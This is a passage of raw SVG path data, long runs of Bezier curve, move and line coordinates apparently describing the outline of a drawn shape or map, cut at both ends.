338.93916,554.59422 341.26779,556.78185 C 343.87591,559.23205 345.13199,559.61321 344.75,557.83853 C 344.6125,557.19971 345.625,556.39193 347,556.04344 C 350.39462,555.18309 350.27261,552.5 346.83886,552.5 C 343.36886,552.5 342.39379,551.43537 344.04337,549.44774 C 344.98404,548.31431 346.29858,548.02103 348.54738,548.44291 C 351.63821,549.02275 354.04218,547.67947 353.66496,545.58333 C 353.57423,545.07917 354.0625,544.47917 354.75,544.25 C 355.4375,544.02083 356,544.33239 356,544.94235 C 356,545.66082 357.03648,545.51538 358.94325,544.52935 C 360.59712,543.6741 362.13443,543.4085 362.45246,543.92308 C 362.76374,544.42673 361.43927,545.35998 359.50921,545.99696 C 357.57914,546.63394 356,547.55608 356,548.04617 C 356,548.53625 355.325,548.67821 354.5,548.36163 C 353.47647,547.96886 352.96029,548.4553 352.875,549.89301 C 352.80625,551.05186 352.6375,552.45 352.5,553 C 352.3625,553.55 352.19375,554.40598 352.125,554.90217 C 352.05625,555.39837 350.61625,556.28673 348.92499,556.8763 C 347.23374,557.46588 346.1353,558.4099 346.48401,558.97413 C 347.62812,560.82534 343.42687,560.04634 341.23037,558 C 338.74826,555.68756 336.6998,555.45186 335.16431,557.30202 C 334.56999,558.01813 332.164,558.71732 329.81767,558.85576 C 327.47134,558.9942 325.315,559.42079 325.0258,559.80374 C 324.73661,560.18668 323.2625,560.35761 321.75,560.18358 z M 346.36163,550.5 C 346.67821,549.675 346.5495,549 346.0756,549 C 345.60171,549 344.95496,549.675 344.63837,550.5 C 344.32179,551.325 344.4505,552 344.9244,552 C 345.39829,552 346.04504,551.325 346.36163,550.5 z M 351.1875,550.31689 C 350.46562,550.02802 349.60312,550.06354 349.27083,550.39583 C 348.93854,550.72812 349.52917,550.96447 350.58333,550.92105 C 351.74828,550.87307 351.98523,550.63611 351.1875,550.31689 z M 362.18233,542.61285 C 360.12634,541.49897 360.04023,541.2115 361.4196,540.06673 C 362.27481,539.35696 363.64085,539.03194 364.45524,539.34445 C 365.26963,539.65696 366.21542,539.46045 366.557,538.90777 C 366.95928,538.25687 367.68552,538.32404 368.61864,539.09846 C 369.72708,540.01839 370.68645,540.02326 372.77961,539.11961 L 375.5,537.94518 L 373.02796,539.89438 C 371.66834,540.96644 370.21855,541.63507 369.8062,541.38023 C 369.39386,541.12539 368.03128,541.58099 366.77825,542.39268 C 364.90516,543.60603 364.08783,543.64519 362.18233,542.61285 z M 381.29689,539.66871 C 381.74913,538.49017 381.22755,538.2434 378.90547,538.53727 C 372.66874,539.32658 377.29581,537.23232 384.51822,535.99688 C 390.23205,535.0195 392.38331,534.98331 393.24999,535.84999 C 394.11667,536.71667 393.6732,537.01732 391.45,537.07029 C 387.69321,537.15979 385.01421,538.21602 385.2873,539.5 C 385.40429,540.05 384.42416,540.6521 383.10924,540.838 C 381.31599,541.09152 380.86304,540.79929 381.29689,539.66871 z M 371,534 C 371,532.69797 375.6953,532.69797 376.5,534 C 376.86058,534.58342 375.84372,535 374.05902,535 C 372.37656,535 371,534.55 371,534 z M 379.5,532 C 379.83992,531.45 381.32898,531.00689 382.80902,531.01531 C 384.91378,531.02729 385.17323,531.2418 384,532 C 382.02414,533.2769 378.71083,533.2769 379.5,532 z M 392,528.96862 C 392,528.43588 392.675,528 393.5,528 C 395.42067,528 395.42067,528.6246 393.5,529.36163 C 392.675,529.67821 392,529.50135 392,528.96862 z M 425,527 C 423.70731,526.1646 423.73371,526.02851 425.19098,526.01531 C 426.12102,526.00689 427.16008,526.45 427.5,527 C 428.28218,528.2656 426.95837,528.2656 425,527 z M 338,508.13436 C 335.525,507.33989 333.275,506.37893 333,505.9989 C 332.725,505.61888 331.29979,505.01444 329.83287,504.65572 C 327.5363,504.09411 327.20214,503.5448 327.4277,500.70202 C 327.71007,497.14326 323.62261,489.71045 322.7427,492.18262 C 321.92043,494.49286 321.16088,492.63458 320.82554,487.49221 C 320.53046,482.96711 320.68713,482.53229 322.5,482.84507 C 323.6,483.03486 324.1664,482.85126 323.75868,482.43708 C 323.35095,482.0229 323.57595,481.00208 324.25868,480.16859 C 325.31559,478.8783 325.16589,478.73927 323.251,479.23271 C 319.90562,480.09476 319.45751,478.19885 322.4075,475.66399 C 323.83338,474.43878 325,472.66315 325,471.71816 C 325,469.76859 326.95903,469.32682 327.07608,471.25 C 327.21027,473.45482 329.84795,465.59577 329.84497,463 C 329.8434,461.625 329.62356,461.03722 329.35644,461.69382 C 329.08933,462.35043 328.11236,462.62739 327.18539,462.30929 C 325.83943,461.84741 325.88321,462.02957 327.40278,463.21376 C 329.62583,464.94618 328.77486,467 325.83399,467 C 324.29538,467 323.95283,466.5653 324.4567,465.25223 C 324.82558,464.29096 325.58514,461.37001 326.14463,458.76123 C 326.70411,456.15245 327.52826,453.79155 327.97607,453.51479 C 328.42389,453.23802 328.3213,451.16393 327.74809,448.90569 C 327.00174,445.96529 327.01879,444.60642 327.80817,444.11856 C 328.41442,443.74388 330.13627,440.75975 331.63451,437.48716 C 333.7639,432.83596 334.40949,429.78652 334.59179,423.5185 C 334.72006,419.10833 335.31744,414.22517 335.91929,412.66704 C 336.52115,411.10891 337.22444,407.95891 337.48214,405.66704 C 337.73985,403.37517 338.24765,399.025 338.61059,396 C 338.97352,392.975 339.3199,388.1636 339.38032,385.30801 C 339.48043,380.57633 339.1803,379.83882 335.99508,376.9894 C 334.07279,375.26975 330.30022,372.75594 327.6116,371.40314 C 321.94729,368.5531 318.04905,365.14469 318.00083,363 C 317.98228,362.175 316.88872,359.7 315.5707,357.5 C 314.25268,355.3 311.48838,350.20089 309.4278,346.16864 C 307.36723,342.1364 304.61139,338.13625 303.30372,337.27944 C 301.99605,336.42262 301.10695,335.22173 301.32794,334.61079 C 301.54893,333.99986 301.32311,332.70949 300.82611,331.74331 C 300.15125,330.43137 300.55682,329.35227 302.42804,327.48105 C 304.79725,325.11184 304.83418,324.91339 303.10667,323.83454 C 301.66443,322.93385 301.43773,322.0415 302.03009,319.5968 C 303.19447,314.79131 305.99142,310 307.63226,310 C 308.44944,310 308.83948,309.54929 308.49903,308.99842 C 308.15857,308.44756 309.2413,306.7535 310.90509,305.23387 C 313.61413,302.75954 313.92309,301.87817 313.8624,296.7975 C 313.81174,292.5562 313.31572,290.69071 311.89732,289.40707 C 310.85379,288.4627 310,286.88633 310,285.90403 C 310,284.92173 309.54655,283.83779 308.99233,283.49526 C 307.56339,282.61213 304.89562,285.56441 305.55943,287.29428 C 305.90386,288.19185 305.33588,288.94041 304.05656,289.27496 C 302.92545,289.57075 302,289.37457 302,288.83899 C 302,288.30342 301.10283,288.14997 300.00629,288.498 C 298.47581,288.98376 298.15215,288.76708 298.61328,287.56539 C 299.03653,286.46243 298.61571,286 297.18878,286 C 294.17631,286 292,284.95143 292,283.5 C 292,282.1384 289.25914,280.56836 287.3834,280.85548 C 285.90234,281.0822 283.70951,278.37147 284.19523,276.91432 C 285.04926,274.35221 279.11114,269.95294 271.40195,267.43641 C 266.27494,265.76279 262.29652,263.69373 259.70693,261.3542 C 256.50343,258.46002 255.29692,257.93788 253.14112,258.5127 C 248.10409,259.85576 243.21486,259.04742 235.72188,255.63276 C 231.57997,253.74523 226.76773,251.88826 225.028,251.50615 C 223.28827,251.12404 221.62212,250.17884 221.32544,249.4057 C 221.02876,248.63257 220.25918,248 219.61525,248 C 217.32825,248 215.24926,244.27125 215.35198,240.35366 C 215.44071,236.96983 214.84748,235.84858 210.97731,232.08516 C 208.51479,229.69056 205.4875,227.06504 204.25,226.25066 C 203.0125,225.43629 202,223.92173 202,222.88499 C 202,221.84825 201.60179,221 201.11508,221 C 200.62838,221 198.39792,219.11226 196.15852,216.80503 C 192.69748,213.23917 191.98639,212.87188 191.41692,214.35591 C 190.99333,215.45976 191.50613,216.91044 192.81142,218.30088 C 193.94686,219.5104 195.73079,222.41051 196.77569,224.74557 C 197.8206,227.08063 198.91258,228.75409 199.2023,228.46436 C 199.49203,228.17463 200.44837,229.03536 201.32751,230.37708 C 202.68679,232.45162 202.71749,232.98957 201.5327,233.97286 C 200.437,234.88221 199.9047,234.69045 199.04009,233.07492 C 198.43543,231.9451 196.60405,230.32949 194.97036,229.48467 C 192.95394,228.44194 192,227.19333 192,225.59676 C 192,222.8446 190.54508,221.42589 186.74441,220.47199 C 185.23498,220.09314 184,219.36613 184,218.85641 C 184,218.3135 184.77393,218.34383 185.86852,218.92963 C 186.8962,219.47963 187.95708,219.70959 188.22602,219.44065 C 188.49496,219.17171 189.28422,219.63754 189.97994,220.47583 C 190.67566,221.31413 191.63979,222 192.12244,222 C 193.60915,222 193.09116,218.97221 191.5,218.36163 C 190.675,218.04504 190,217.14504 190,216.36163 C 190,215.57821 189.325,214.67821 188.5,214.36163 C 187.675,214.04504 187,213.3438 187,212.8033 C 187,212.26281 186.12529,211.07345 185.05619,210.16029 C 183.9871,209.24713 182.90404,207.05451 182.64939,205.28781 C 181.72321,198.86211 188.64569,200.46785 190.30087,207.06264 C 191.0253,209.94899 196.1291,216 197.8392,216 C 198.47764,216 199,216.64468 199,217.43261 C 199,218.22055 199.9,219.15087 201,219.5 C 202.74268,220.05311 203.538,221.33063 202.75,222.31105 C 202.6125,222.48213 204.3,224.16963 206.5,226.06105 C 208.7,227.95247 210.65799,229.86147 210.85109,230.30327 C 211.04419,230.74506 212.36357,232.18344 213.78306,233.49966 C 215.55989,235.14723 216.43143,237.07777 216.58059,239.69639 C 216.86061,244.61272 217.86009,247 219.63837,247 C 220.42179,247 221.31124,247.6475 221.61492,248.43889 C 221.91861,249.23028 223.52249,250.17549 225.17911,250.53934 C 226.83573,250.90319 231.57997,252.74523 235.72188,254.63276 C 243.18996,258.03607 248.11601,258.85723 253.07458,257.52542 C 255.0366,256.99844 256.38674,257.45454 258.74913,259.44236 C 261.75867,261.97472 261.86785,261.99173 262.49194,260.02541 C 262.9227,258.66818 264.01977,257.98902 265.81739,257.96673 L 268.5,257.93346 L 266.40602,256.18277 C 264.7015,254.7577 264.55416,254.20591 265.61381,253.21604 C 266.32979,252.54722 268.07541,252 269.49298,252 C 273.1793,252 276.83584,249.27448 278.74496,245.10374 C 279.65223,243.12168 280.55554,241.20069 280.75231,240.83486 C 281.5004,239.44411 276.93222,238.94116 273.04917,239.98676 C 270.51731,240.66852 269,241.66059 269,242.63425 C 269,243.49069 268.2141,245.52183 267.25356,247.1479 C 265.99894,249.27181 264.95757,249.96066 263.5556,249.59404 C 262.48226,249.31335 261.01816,249.56997 260.30204,250.1643 C 259.58592,250.75862 259,250.97593 259,250.6472 C 259,250.31846 257.875,250.47723 256.5,251 C 254.91366,251.60313 254,251.60104 254,250.9943 C 254,250.46839 252.9875,249.78312 251.75,249.47148 C 249.31661,248.85866 245.13276,243.32255 243.45845,238.5 C 242.88559,236.85 242.43993,232.89393 242.46809,229.70873 C 242.51323,224.6014 242.26626,223.85395 240.37687,223.37974 C 239.19855,223.084 236.74415,220.51507 234.92265,217.67102 C 233.10115,214.82696 231.1359,212.16939 230.55542,211.76531 C 228.67051,210.45321 225.12273,210.95827 224.16172,212.67551 C 223.35095,214.12427 222.57305,213.71827 218.41362,209.67551 C 215.76788,207.10398 213.12997,204.94468 212.55159,204.87706 C 211.97322,204.80944 207.225,204.69694 202,204.62706 C 195.98203,204.54657 191.76694,204.01416 190.5,203.17449 C 188.5,201.84899 188.5,201.84899 190.5,202.6228 C 191.6,203.04839 197,203.42224 202.5,203.45358 C 213.19996,203.51454 214.96211,204.13953 219.03581,209.3184 C 221.37133,212.28753 223.17772,212.69572 224.88391,210.63989 C 226.75328,208.38743 231.02283,209.92438 233.21431,213.63866 C 234.3051,215.4874 235.55432,217 235.99037,217 C 236.42642,217 237.05305,218.07523 237.38289,219.38941 C 237.75589,220.87558 238.97553,222.02803 240.60929,222.43807 C 243.90359,223.26489 244.45988,222.72781 243.04584,220.08565 C 242.20215,218.5092 242.22306,218 243.13148,218 C 243.7925,218 244.07083,217.7375 243.75,217.41667 C 242.78298,216.44965 246.85603,213 248.96482,213 C 250.04547,213 251.37735,212.16343 251.92457,211.14095 C 252.73938,209.61846 253.99512,209.30989 258.86092,209.43649 C 262.12871,209.52151 265.48176,210.15494 266.31215,210.8441 C 267.35026,211.70565 268.02756,211.76443 268.48007,211.03225 C 268.84204,210.44657 269.6696,210.23309 270.3191,210.55785 C 270.96859,210.8826 270.62649,210.43994 269.55887,209.57416 C 268.49125,208.70837 267.81625,207.9625 268.05887,207.91667 C 276.78367,206.26847 287,206.91463 287,209.11464 C 287,209.66864 287.88342,209.59757 289.10173,208.94556 C 290.87258,207.99783 291.64006,208.23903 293.97673,210.47771 C 295.60076,212.03362 296.75,214.2009 296.75,215.70763 C 296.75,217.12276 297.49071,218.69511 298.39603,219.20175 C 299.30135,219.7084 299.81821,220.48512 299.54461,220.92781 C 298.92503,221.93032 302.79036,225.54298 303.60788,224.72546 C 304.81367,223.51967 304.14269,219.31971 301.62076,212.28724 C 298.84191,204.53833 298.9072,203.19027 302.1699,200.94857 C 303.32948,200.15185 305.51808,198.4875 307.03347,197.25 C 308.54885,196.0125 310.17375,194.99945 310.64436,194.99878 C 311.11496,194.99811 312.80749,193.87311 314.40554,192.49878 C 316.00359,191.12445 316.80521,190 316.18692,190 C 315.56864,190 315.32179,189.325 315.63837,188.5 C 315.95496,187.675 316.94096,187 317.8295,187 C 319.07019,187 318.93908,186.64563 317.26439,185.47263 C 316.06505,184.63258 315.3206,183.3281 315.61006,182.57378 C 315.89952,181.81947 315.64833,180.90069 315.05186,180.53205 C 314.45539,180.16342 314.25597,179.39485 314.60869,178.82414 C 315.02218,178.1551 315.5554,178.26846 316.10969,179.14324 C 316.73551,180.13091 316.97354,179.87916 316.98469,178.21778 C 317.00432,175.29235 320.96294,173.56706 322.58036,175.77901 C 323.53378,177.0829 323.7869,177.03172 324.50281,175.3903 C 324.95626,174.35063 325.36613,173.06329 325.41363,172.52953 C 325.53319,171.18617 330.02835,169.03257 332.75,169.01474 C 333.9875,169.00663 335,168.52344 335,167.94098 C 335,167.35852 335.50838,167.19616 336.12973,167.58018 C 336.82049,168.00709 337.06628,167.73861 336.76229,166.8892 C 336.1605,165.20771 338.99773,160 340.51561,160 C 341.11202,160 342.1625,159.4375 342.85,158.75 C 343.5375,158.0625 345.0525,157.5 346.21667,157.5 C 347.38083,157.5 348.52083,156.9375 348.75,156.25 C 348.97917,155.5625 348.7571,155 348.25653,155 C 347.75595,155 347.5403,153.67877 347.77731,152.06392 C 348.17858,149.32993 347.99059,149.13403 345.04596,149.21776 C 342.44615,149.29167 341.54815,149.96538 339.99723,153.00544 C 338.11385,156.69715 338.09761,156.70431 330.08197,157.37279 C 321.31119,158.10424 318.73341,158.75963 319.53375,160.05461 C 320.29585,161.28771 316.5979,163 313.17273,163 C 311.54542,163 309.97654,163.61875 309.68634,164.375 C 309.05851,166.01111 296.37076,170.0795 294.33382,169.29786 C 292.84794,168.72767 293.1077,166.37888 294.625,166.66501 C 295.10625,166.75576 295.61223,165.29326 295.7494,163.41501 C 296.00913,159.85859 295.2289,159.1711 293.21667,161.18333 C 292.56583,161.83417 291.71833,162.05167 291.33333,161.66667 C 290.94833,161.28167 291.16583,160.43417 291.81667,159.78333 C 292.4675,159.1325 293,157.79 293,156.8 C 293,154.56685 290.22996,154.4502 287.22251,156.5567 C 286.00013,157.41289 284.99311,157.75039 284.98469,157.3067 C 284.97627,156.86302 284.52149,157.175 283.97407,158 C 283.42666,158.825 283.22602,161.075 283.52821,163 C 283.97594,165.85212 283.67842,166.74658 281.92093,167.8321 C 280.62747,168.63101 279.40046,168.80046 278.85545,168.25545 C 277.6559,167.0559 277.45039,161.99536 278.50338,159.58596 C 279.09859,158.22401 279.00241,157.88047 278.16994,158.39497 C 277.52647,158.79266 277,158.62266 277,158.0172 C 277,155.94702 280.49723,153.28843 284,152.6958 L 287.5,152.10364 L 284.3488,153.68645 C 282.3481,154.69139 280.65756,156.6441 279.71842,159.03493 C 278.28444,162.68547 278.44789,168 279.99413,168 C 281.775,168 282.96846,165.0923 282.385,162.175 C 281.85361,159.51804 282.28156,158.55982 285.31544,155.61353 C 289.30246,151.7416 288.40293,150.45858 282.48028,151.56968 C 280.62025,151.91862 278.95238,151.73197 278.5825,151.13348 C 278.2269,150.55811 277.27536,150.34084 276.46797,150.65066 C 275.66059,150.96049 275,150.66073 275,149.98454 C 275,149.06531 274.6591,149.03803 273.64889,149.87643 C 272.38564,150.92484 271.38405,151.04178 264.25,150.9738 C 261.6148,150.94868 261.58103,150.88607 263.44113,149.4738 C 265.86376,147.63443 266.91431,147.61311 267.59597,149.38949 C 268.19555,150.95199 271.35064,150.47255 274.47251,148.34455 C 277.17733,146.50082 278.80483,146.6592 278.63889,148.75 C 278.52504,150.18451 279.22112,150.45595 282.5,150.25568 C 289.05747,149.85516 289.60534,149.2214 285.69066,146.56483 C 281.44762,143.68542 277.87827,143.00094 276.47322,144.79724 C 275.27963,146.3232 267.80043,148.22161 267.02526,147.19538 C 266.73637,146.81292 265.825,146.42569 265,146.33487 C 260.44876,145.83386 253.52082,144.06233 253.27957,143.33787 C 253.12612,142.87704 231.38267,142.62104 204.9608,142.76898 C 167.63164,142.97799 156.95626,143.31242 157.079,144.26898 C 157.50914,147.6211 156.87201,149 154.89301,149 C 153.50003,149 152.96768,148.5266 153.32209,147.60302 C 153.66558,146.70791 153.01449,146.04476 151.50973,145.75711 L 149.16129,145.30818 L 150.97264,148.68777 C 152.55643,151.64278 152.62729,152.59705 151.53666,156.28368 C 150.85063,158.60266 150.48673,161.0625 150.728,161.75 C 150.96927,162.4375 150.70258,163 150.13535,163 C 149.43249,163 149.44052,163.96524 150.16059,166.03082 C 150.74169,167.69778 150.98553,169.94733 150.70245,171.02983 C 150.41937,172.11233 150.59551,173.25001 151.09388,173.55802 C 151.59225,173.86603 152,174.84354 152,175.73028 C 152,178.00582 154.92428,180.96629 156.5542,180.34083 C 157.50493,179.976 157.79797,180.45275 157.51767,181.90827 C 157.29611,183.05872 157.539,184 158.05742,184 C 158.57584,184 159,184.89619 159,185.99153 C 159,187.08687 159.9,188.54511 161,189.23207 C 162.1,189.91903 163,191.04785 163,191.74055 C 163,192.43325 163.83086,193 164.84636,193 C 167.35261,193 172.28011,195.54705 174.48302,197.98124 C 175.929,199.57903 177.05878,199.85433 180.14474,199.36086 C 182.8698,198.92511 184,199.10637 184,199.97918 C 184,200.69355 183.3343,200.95852 182.42054,200.60788 C 181.55183,200.27453 179.76393,200.27213 178.44743,200.60255 C 176.13816,201.18214 176.10771,201.3076 177.58346,204.1614 C 178.42479,205.78834 180.58765,208.78009 182.38982,210.80974 C 186.93195,215.92519 187.46592,217.75 184.42065,217.75 C 183.08929,217.75 182,217.35625 182,216.875 C 182,216.39375 182.675,216 183.5,216 C 185.79901,216 185.29193,214.37381 182.25,211.99126 C 180.7375,210.80662 177.88255,206.83645 175.90568,203.16868 C 173.9288,199.50091 171.8138,196.5 171.20568,196.5 C 170.59755,196.5 169.5375,195.9375 168.85,195.25 C 168.1625,194.5625 166.34,194 164.8,194 C 163.12118,194 162,193.46143 162,192.65499 C 162,191.91523 161.1,190.49549 160,189.5 C 158.9,188.50451 158,187.19235 158,186.58408 C 158,185.97582 156.43363,183.68306 154.51918,181.48907 C 152.60474,179.29508 151.02974,176.7125 151.01918,175.75 C 151.00863,174.7875 150.56125,174 150.025,174 C 149.4842,174 149.30632,172.71841 149.62557,171.12217 C 149.94213,169.53936 149.72837,167.36097 149.15054,166.28129 C 148.38634,164.85337 148.49213,163.01517 149.53862,159.53795 C 151.55214,152.8475 149.55113,145.02777 145.33386,143.10625 C 144.10594,142.54678 141.23735,140.91238 138.95923,139.47426 C 135.22375,137.11616 134.96058,136.69462 136.2781,135.17975 C 137.78017,133.45269 137.52096,130.56 135.95106,131.53024 C 135.4681,131.82873 134.20096,131.20096 133.13519,130.13519 C 132.06943,129.06943 130.21188,127.88463 129.0073,127.50232 C 127.47473,127.0159 126.96662,126.23565 127.31496,124.9036 C 127.58875,123.85662 127.40489,123 126.90638,123 C 126.40787,123 126,121.8199 126,120.37756 C 126,118.12556 125.78168,117.9363 124.45449,119.03777 C 123.60446,119.74323 123.14034,120.92333 123.42311,121.66021 C 124.32783,124.01788 120.1141,123.14644 117.81305,120.5 C 116.6175,119.125 115.11559,118 114.47547,118 C 113.83534,118 111.55399,116.24702 109.4058,114.10449 C 107.25761,111.96196 103.8244,109.32507 101.77644,108.24472 C 99.728483,107.16437 98.310494,106.02284 98.625354,105.70798 C 98.940214,105.39312 98.182949,105.4009 96.942542,105.72528 C 95.698574,106.05058 94.938767,105.90809 95.248137,105.40752 C 95.556621,104.90839 93.939488,104.47879 91.654508,104.45286 C 89.369529,104.42694 83.680164,104.12342 79.011477,103.77837 C 74.342789,103.43333 70.067789,103.50819 69.511477,103.94472 C 68.955164,104.38125 66.475,104.99305 64,105.30427 C 61.525,105.61549 57.840416,106.1787 55.812036,106.55584 C 52.366209,107.19653 52.161936,107.09676 52.700774,105.03624 C 53.01796,103.82332 53.552543,103.20647 53.888738,103.66547 C 54.607583,104.64688 56.083293,104.61621 61.483335,103.50762 C 64.767959,102.83331 65.118776,102.55399 63.483335,101.91522 C 60.521613,100.75843 56,100.85038 56,102.06739 C 56,102.66599 55.154214,102.86633 54.074219,102.52356 C 52.890111,102.14773 51.82808,102.48479 51.316614,103.39873 C 50.859111,104.21624 49.363212,105.33244 47.992395,105.87917 C 45.855725,106.73135 45.785448,106.88545 47.5,106.95885 C 49.345307,107.03785 49.306634,107.19572 47,109 C 45.625,110.07554 44.076175,110.96553 43.558167,110.97776 C 43.040159,110.98999 39.586485,112.8 35.883337,115 C 32.180189,117.2 28.554013,119.00277 27.82517,119.00616 C 27.096326,119.00955 25.298134,119.63938 23.829186,120.40578 C 21.532908,121.60382 20.868648,121.5963 19.09235,120.35213 C 17.356332,119.13618 17.112424,119.1294 17.565344,120.30969 C 17.960327,121.339 16.687534,121.9955 12.802181,122.76652 C 9.8859812,123.34521 7.342439,123.66443 7.1498645,123.47588 C 6.3910838,122.73296 8.2098333,121 9.7483095,121 C 13.363638,121 31.824149,112.70916 32.730239,110.67853 C 33.361588,109.26363 33.877497,108.99277 34.383058,109.81078 C 34.787295,110.46485 34.614919,111 34,111 C 33.385081,111 33.140058,111.4176 33.455504,111.928 C 33.77095,112.43841 33.122507,113.14373 32.014521,113.49539 C 30.906534,113.84705 30,114.57028 30,115.10257 C 30,115.69211 30.78169,115.65202 32,115 C 33.1,114.4113 34,114.24021 34,114.6198 C 34,114.9994 34.7875,114.61004 35.75,113.75457 C 36.7125,112.8991 39.236586,111.48181 41.35908,110.60504 C 43.979252,109.52268 45.040062,108.54678 44.663402,107.56522 C 44.307,106.63645 45.136097,105.66475 46.9822,104.84759 C 48.562656,104.14801 49.591065,103.10861 49.267553,102.53781 C 48.944041,101.96702 49.052478,101.83848 49.508523,102.25218 C 49.964569,102.66588 51.049215,102.37024 51.918848,101.59521 C 53.737293,99.974575 61.922915,97.589582 62.767608,98.434275 C 63.078757,98.745424 62.695833,99.013684 61.916667,99.030409 C 60.925857,99.051676 61.041798,99.376027 62.302358,100.1094 C 63.44252,100.77273 64.544736,100.81164 65.302358,100.2153 C 66.660387,99.146371 73,98.975957 73,100.00838 C 73,101.5353 83.919906,103.5488 89.75,103.09689 C 90.69342,103.02376 91,99.10765 91,87.129961 L 91,71.259922 L 86.75,70.18633 C 82.901525,69.214166 60.083775,67.33065 44.261048,66.679032 C 40.829625,66.537718 37.532747,65.932747 36.934652,65.334652 C 36.151392,64.551392 34.400023,64.74492 30.673603,66.026504 C 27.828122,67.005117 23.25,68.07736 20.5,68.409265 C 17.496623,68.771751 14.991088,69.69884 14.225567,70.730908 C 13.437639,71.793185 10.956316,72.676849 7.7255674,73.045728 L 2.5,73.642369 L 8,76.172626 C 11.025,77.564268 15.714437,78.996672 18.42097,79.355746 C 24.028844,80.099738 25.068279,80.712725 22.97104,82.03906 C 20.941428,83.322626 8.704501,83.287144 9.5,82 C 9.8399187,81.45 9.443034,81 8.618034,81 C 7.793034,81 6.8399187,81.45 6.5,82 C 6.1600813,82.55 4.7835237,83 3.440983,83 C 2.0984424,83 1,83.45 1,84 C 1,84.55 1.7015576,85 2.559017,85 C 3.4164763,85 3.859942,85.417602 3.5444962,85.928004 C 3.2290504,86.438406 3.7649928,87.051896 4.7354792,87.291317 C 6.3737546,87.695481 16.690028,87.497122 17.25,87.05069 C 17.3875,86.941069 18.562489,86.655014 19.861087,86.415011 C 21.572563,86.098702 22.075544,86.360752 21.689231,87.367466 C 21.396114,88.131319 21.636215,89.236215 22.222789,89.822789 C 22.978122,90.578122 22.444734,91.071514 20.394645,91.513852 C 18.80259,91.857362 16.435791,92.571184 15.135091,93.100125 C 13.834392,93.629065 11.975183,93.809511 11.003516,93.501116 C 9.9387747,93.16318 9.0036087,93.548213 8.6498094,94.470199 C 8.3269375,95.311589 7.3470888,96 6.4723678,96 C 5.5976468,96 5.1038313,96.358986 5.375,96.797746 C 5.6461687,97.236506 5.4664647,98.245244 4.9756578,99.039387 C 4.242335,100.22593 3.8530649,100.25088 2.7916408,99.179362 C 1.7350391,98.112716 1.8212364,97.694203 3.2653318,96.879451 C 4.2362644,96.331656 5.8343695,95.020783 6.8166766,93.9664 C 7.8205567,92.888861 9.893968,92.06536 11.551345,92.085921 C 15.598789,92.136135 21,90.940021 21,89.993489 C 21,88.718092 18.843387,88.358706 12.5,88.57702 C 4.2825696,88.859832 -1.2047343e-014,87.491171 2.1566082e-014,84.582163 C 4.3808232e-014,82.657259 0.84836051,82.115911 5.6821926,80.956293 C 10.056035,79.907024 11.45675,79.870249 11.765526,80.796578 C 11.986153,81.45846 13.329167,82 14.75,82 C 16.170833,82 17.035099,81.701766 16.670591,81.337257 C 15.627777,80.294443 2.7091127,75 1.2074166,75 C 0.1402633,75 0.17165735,74.685486 1.3571429,73.5 C 2.2206593,72.636484 4.6634737,72 7.1141202,72 C 10.078013,72 12.058052,71.35464 13.632627,69.875403 C 14.876468,68.706875 17.830472,67.354176 20.197078,66.869405 C 22.563685,66.384634 26.75,65.507988 29.5,64.921302 C 34.949264,63.758755 41.665601,63.675296 43.402164,64.748551 C 44.005313,65.121317 45.726306,65.29755 47.226594,65.14018 C 48.726882,64.982809 51.427152,65.34233 53.227195,65.939115 C 55.027238,66.5359 63.25,67.467729 71.5,68.009845 C 85.183695,68.909015 92.645195,69.745871 103.34138,71.581065 C 105.45414,71.943561 108.15414,71.77692 109.34138,71.210752 C 113.05976,69.437542 114.63708,69.157669 116.0368,70.022745 C 116.78229,70.483482 118.14564,70.45724 119.06647,69.964428 C 121.80871,68.496825 131.71449,67.260717 133.35883,68.180934 C 134.39106,68.758601 135.17891,68.50273 135.80328,67.387039 C 136.62807,65.91322 137.13187,66.017728 140.61229,68.38461 C 143.99574,70.685541 144.64401,70.832061 145.61024,69.514234 C 146.85449,67.817232 149.5737,67.501215 150.46884,68.949586 C 150.79162,69.471858 153.22151,69.642666 155.86858,69.329159 C 158.51566,69.015652 161.55446,69.226368 162.62147,69.797417 C 163.68848,70.368466 167.92266,71.098221 172.03075,71.419095 C 177.98845,71.884438 178.94348,71.783015 176.75,70.917918 C 173.24046,69.533773 173.24046,68.247906 176.75,67.716254 C 179.13987,67.35422 179.04165,67.278037 176,67.134519 C 174.075,67.04369 172.03494,66.638765 171.46654,66.234687 C 170.02244,65.208074 170.23529,62.478823 171.75,62.6 C 172.4375,62.655 175.325,62.7675 178.16667,62.85 C 184.49815,63.033817 183.92117,63.941826 176.81541,64.976505 C 171.71556,65.7191 171.84471,65.755994 180,65.88625 C 184.675,65.960919 190.3,66.326626 192.5,66.698933 C 196.11078,67.309986 196.25674,67.442437 194,68.06012 C 192.625,68.436467 189.62164,68.520413 187.32587,68.246669 C 185.0301,67.972924 181.4301,68.084237 179.32587,68.494031 C 176.10365,69.121553 175.81556,69.366939 177.5,70.049271 C 178.6,70.494858 181.66406,70.891058 184.30902,70.929715 C 187.00564,70.969127 188.86532,71.408906 188.54271,71.930902 C 187.49332,73.628841 189.40855,73.795146 199.37079,72.871134 C 206.97828,72.165529 209.61515,72.24731 210.87079,73.227802 C 212.29532,74.340168 212.33975,74.294812 211.22448,72.866783 C 210.17204,71.519207 210.21576,71.131183 211.47448,70.648168 C 213.25757,69.963929 216.19057,70.88264 215.54707,71.923841 C 215.10215,72.643733 220.24065,72.2618 222.97197,71.371963 C 224.26794,70.949752 224.26794,70.781101 222.97197,69.961518 C 221.90891,69.289227 222.6112,68.994425 225.5,68.900314 L 229.5,68.770002 L 225.93724,68.072855 C 222.39728,67.380169 216.44767,64 218.76839,64 C 219.43576,64 218.56915,62.65 216.84258,61 C 214.63235,58.887786 212.71151,58 210.35169,58 C 206.71785,58 206.11294,59.018919 208.54733,61.039284 C 209.74303,62.03162 209.81069,62.498965 208.84508,63.095746 C 207.2076,64.107763 205.72862,63.14958 206.36568,61.489425 C 206.76023,60.461265 205.26158,60.271796 199.36623,60.604509 C 194.10867,60.901227 192.06648,60.701449 192.53915,59.936647 C 193.01138,59.172562 191.82863,59.053111 188.59385,59.538197 C 184.58966,60.138663 184.05674,60.015723 184.59406,58.615483 C 185.33097,56.695133 185.49088,56.70917 178.79922,58.106815 C 175.63419,58.767876 172.39248,60.252801 170.75,61.793906 C 168.06795,64.310425 166.76483,63.696827 169.25,61.087605 C 170.27176,60.014841 170.04352,59.905465 168,60.488581 C 166.625,60.880934 165.00039,61.831512 164.38976,62.600975 C 163.77912,63.370439 162.20412,64.006891 160.88976,64.015313 C 159.57539,64.023735 157.86227,64.434288 157.08282,64.927652 C 156.15238,65.516588 154.44018,65.16787 152.09763,63.91234 C 